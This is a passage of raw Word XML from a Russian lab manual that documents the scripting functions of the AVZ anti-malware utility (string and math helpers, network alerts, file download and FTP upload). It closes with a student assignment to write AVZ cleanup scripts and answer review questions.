        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вращается пустая строка.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Length(s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): Integer;</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Возвращает</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>длинну</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>строки</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> s.</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Trim(s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">):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строку s, в которой удалены все пробелы и спецсимволы в начале и конце.</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Upper</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ase(s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">):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строку s, приведенную к верхнему регистру.</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Round(e: Extended):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округление до целого по правилам округления</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Trunc(e: Extended):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целую часть числа. Важно отметить, что в отличие от окру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ления данная </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>функция отбрасывает дробную часть, не используя правила округления. Аналогична функции Int</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Int(e: Extended):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целую часть числа. Важно отметить, что в отличие от окру</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ления данная функция отбрасывает дробную часть, не используя правила округления</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Frac(X: Extended): Extended;</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Возвращает</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дробную</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>часть</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>числа</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserv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Sqrt(e: Extended): Extended;</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квадратный корень заданного числа.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Abs(e: Extended): Extended;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абсолютное значение числа</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Randomize;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инициализирует генератор случайных чисел. Данная операция необяз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тельная, так как выполняется автоматически перед запуском скрипта.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SendNetMessage(AHost, AFromSt, AToSt, AMessageSt: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Отправляет сообщение по сети, аналог NET SEND.</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SendSyslogMessage(AHost, AMessageSt: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Отправляет сообщение стандартной службе Syslog (порт 514 UDP) на указанном сервере, удобно для регистрации различных событий</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SendEmailMessage(AServer, AFrom, ARecipients, ASubject, AMessageSt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; AIdentification : boolean; ALogin, APasswd : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; AAttachFile1, AAttachFile2, AAttachFile3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Данная функция производит отправку письма под управлением скрипта.</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DownloadFile(AURL, ASaveName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserv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ADownloadMode : integer = 0;</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AProxyServer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AProxyLogin : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">='';AProxyPasswd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Осуществляет загрузку файла из Интернет. Параметры (первые два обяз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тельны, остальные – необязательные):</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AURL – URL загрузки включая протокол, например </w:t>
      </w:r>
      <w:hyperlink r:id="rId146" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://www.myserver.ru/myfile.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ASaveName – имя, под которым файл сохраняется на диске в случае успешной загрузки. Параметр обязателен, диск должен быть доступен на з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пись, а указанный каталог должен существовать на диске. В имени файла доп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">стимо указывать </w:t>
      </w:r>
      <w:hyperlink r:id="rId147" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>макросы</w:t>
        </w:r>
      </w:hyperlink>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ADownloadMode – код режима загрузки файла. Необязательный пар</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>метр, по умолчанию 0. Поддерживаются следующие коды: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0 – загрузка по настройкам Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1 – прямой доступ в Интернет, настройки IE игнорируются</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2 – загрузка через прокси сервер без авторизации. Для корректной работы данного режима необходимо указать прокси в параметре AProxyServer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3 – загрузка через прокси сервер с авторизацией. Для корректной работы данного режима необходимо указать прокси в параметре AProxyServer и задать логин и пароль в параметрах AProxyLogin и AProxyPasswd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4 – загрузка через прокси сервер с NTLM авторизацией. Для корректной работы данного режима необходимо указать прокси в параметре AProxyServer и задать логин и пароль в параметрах AProxyLogin и AProxyPasswd</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FTPSendFile(AFileName, AServer, APath, ASaveName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserv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APassiveMode : boolean = false;</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ALogin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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">APasswd : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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Осуществляет передачу указанного файла на сервер по протоколу FTP. Параметры (первые 4 параметра обязательны):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AFileName – полное имя загружаемого на FTP сервер файла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AServer – имя сервера или его IP адрес</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APath – путь к папке на FTP сервере, в который необходимо поместить файл. Указание пустого пути означает, что файл должен быть помещен в тек</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щий после подключения к серверу каталог. Если путь указан, то после успешно подключения выполняется попытка сделать заданный каталог текущим, в сл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чае ошибки отправка файла блокируется. Путь может быть относительным и абсолютным – абсолютный путь должен начинаться с /</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ASaveName – имя файла на сервере. Если передать в ASaveName пустую строку, то имя файла берется из AFileName. Данный параметр полезен для д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>намического формирования имен файлов – например, включея в имя даты или имени ПК</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APassiveMode – режим работы с FTP сервером. Если APassiveMode=true, то включается пассивный режим</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ALogin, APasswd – логин и пароль для авторизации на сервере. Должны задаваться парой, если логин не задан, то в качестве логина используется зн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чение 'anonymous', в качестве пароля – '</w:t>
      </w:r>
      <w:hyperlink r:id="rId148" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>anonymous@anonymous.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>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tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить описание, назначение и возможности подсистемы скриптов пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">граммы AVZ, а именно (в соответствии с описанием программы): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Введение</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Структура скрипта</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procedure Sleep</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lastRenderedPageBreak/>
        <w:t>procedure ActivateWatchDog</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procedure SetupAVZ</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procedure RunScan</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procedure ExitAVZ</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function GetSystemBootMode</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function GetEnvironmentVariable</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Информация о компьютере</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Взаимодействие с пользователем</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Автоматическое обновление</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протоколом</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Карантин и папка Infected</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Функции запроса информации о AVZ</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Интерфейс AVZ</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Управление AVZPM</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Управление AVZGuard</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Управление Boot Cleaner</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Эвристическая проверка системы</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Эвристическая чистка системы</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Восстановление системы и стандартные скрипты</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Завершение работы и перезагрузка</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Использование AV анализатора в скрипте</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CLSID и BHO</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со службами и драйверами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SPI/LSP</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автозапуском и Winlogon</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реестром</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INI файлами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файлом Hosts</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файлами и папками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текстовыми файлами и списками строк</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Поиск файла и папок</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процессами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Сигнатурный анализатор файла</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результатами исследования системы</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Функции запроса статистики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Обработка параметров командной строки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со строками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числами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Передача оповещения администратору</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Интернет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчёт должен содержать описание  всех процедур, функций и возможн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стей скриптов (без примеров).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Написать Скрипты для программы AVZ в соответствии с заданием:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выполнить действия, перечисленные в задании в предыдущей работы  (пункт 3 по желанию) с помощью созданного скрипта для программы AVZ, предварительно создать в ветках реестра, проверяемых в  предыдущей работе строковую запись «АВЗ» и запустить калькулятор, который считать подозр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тельным процессом. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для защиты работы продемонстрировать работу скрипта, объяснить пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цесс работы и результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
      </w: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widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00EF353E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:t>Какие процедуры, функции и возможности присутствуют у подс</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF353E">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF353E">
        <w:t>стемы работы скриптов в AVZ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="Mt--0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:lastRenderedPageBreak/>
        <w:t>Что такое макросы, используемые в подсистеме работы скриптов в AVZ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00D86726" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00EF353E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF353E">
        <w:rPr>
